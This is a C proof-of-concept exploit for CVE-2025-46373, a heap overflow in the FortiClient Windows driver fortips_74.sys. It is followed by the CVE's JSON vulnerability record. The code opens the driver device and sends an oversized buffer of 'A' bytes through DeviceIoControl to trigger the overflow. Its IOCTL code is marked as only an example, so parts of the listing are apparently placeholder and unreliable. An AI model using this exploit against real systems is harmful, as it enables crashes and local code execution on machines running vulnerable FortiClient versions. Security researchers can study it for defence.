CVE-2025-46373

// CVE-2025-46373 PoC - FortiClient Windows Heap Overflow // This PoC demonstrates the heap overflow condition in fortips_74.sys // Target: FortiClient Windows 7.2.0-7.2.8, 7.4.0-7.4.3 #include <windows.h> #include <stdio.h> #include <winioctl.h> #define FORTIPS_DEVICE_NAME "\\\\.\\fortips74" #define HEAP_OVERFLOW_PAYLOAD_SIZE 0x1000 // Malicious IPSec packet structure to trigger overflow typedef struct { DWORD packet_length; DWORD flags; BYTE payload[HEAP_OVERFLOW_PAYLOAD_SIZE]; // Oversized payload } MALICIOUS_IPSEC_PACKET; // IOCTL code for IPSec processing (example) #define IOCTL_FORTIPS_PROCESS_PACKET 0x9A0B1234 void trigger_heap_overflow() { HANDLE hDevice; DWORD bytesReturned; MALICIOUS_IPSEC_PACKET packet; printf("[*] Opening FortiClient fortips74 device...\n"); hDevice = CreateFileA( FORTIPS_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device. Ensure FortiClient IPSec is running.\n"); return; } printf("[*] Preparing malicious packet (size: %d bytes)...\n", sizeof(packet)); // Fill payload with controlled data to overwrite heap structures memset(&packet, 0x41, sizeof(packet)); // Fill with 'A' for debugging packet.packet_length = sizeof(MALICIOUS_IPSEC_PACKET); packet.flags = 0x00000001; printf("[*] Sending malicious packet to trigger heap overflow...\n"); // Send oversized packet to trigger overflow in driver BOOL result = DeviceIoControl( hDevice, IOCTL_FORTIPS_PROCESS_PACKET, &packet, sizeof(packet), NULL, 0, &bytesReturned, NULL ); if (result) { printf("[+] Packet sent successfully\n"); } else { printf("[+] IOCTL returned (overflow may have been triggered)\n"); } CloseHandle(hDevice); printf("[*] PoC execution completed\n"); } int main() { printf("CVE-2025-46373 PoC - FortiClient Windows Heap Overflow\n"); printf("Target: FortiClient Windows 7.2.x / 7.4.x\n"); printf("Author: Security Research Team\n\n"); trigger_heap_overflow(); return 0; }

{"cve": {"id": "CVE-2025-46373", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:01.753", "lastModified": "2025-12-16T11:15:52.043", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Heap-based Buffer Overflow vulnerability [CWE-122] vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.8 may allow an authenticated local IPSec user to execute arbitrary code or commands via \"fortips_74.sys\". The attacker would need to bypass the Windows heap integrity protections"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:forticlient:*:*:*:*:*:windows:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.9", "matchCriteriaId": "5557A33B-0705-4621-B729-BD087AB315AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:forticlient:*:*:*:*:*:windows:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.4", "matchCriteriaId": "51121FCA-2CA9-4B4B-A27C-C4729AB797BB"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-125", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}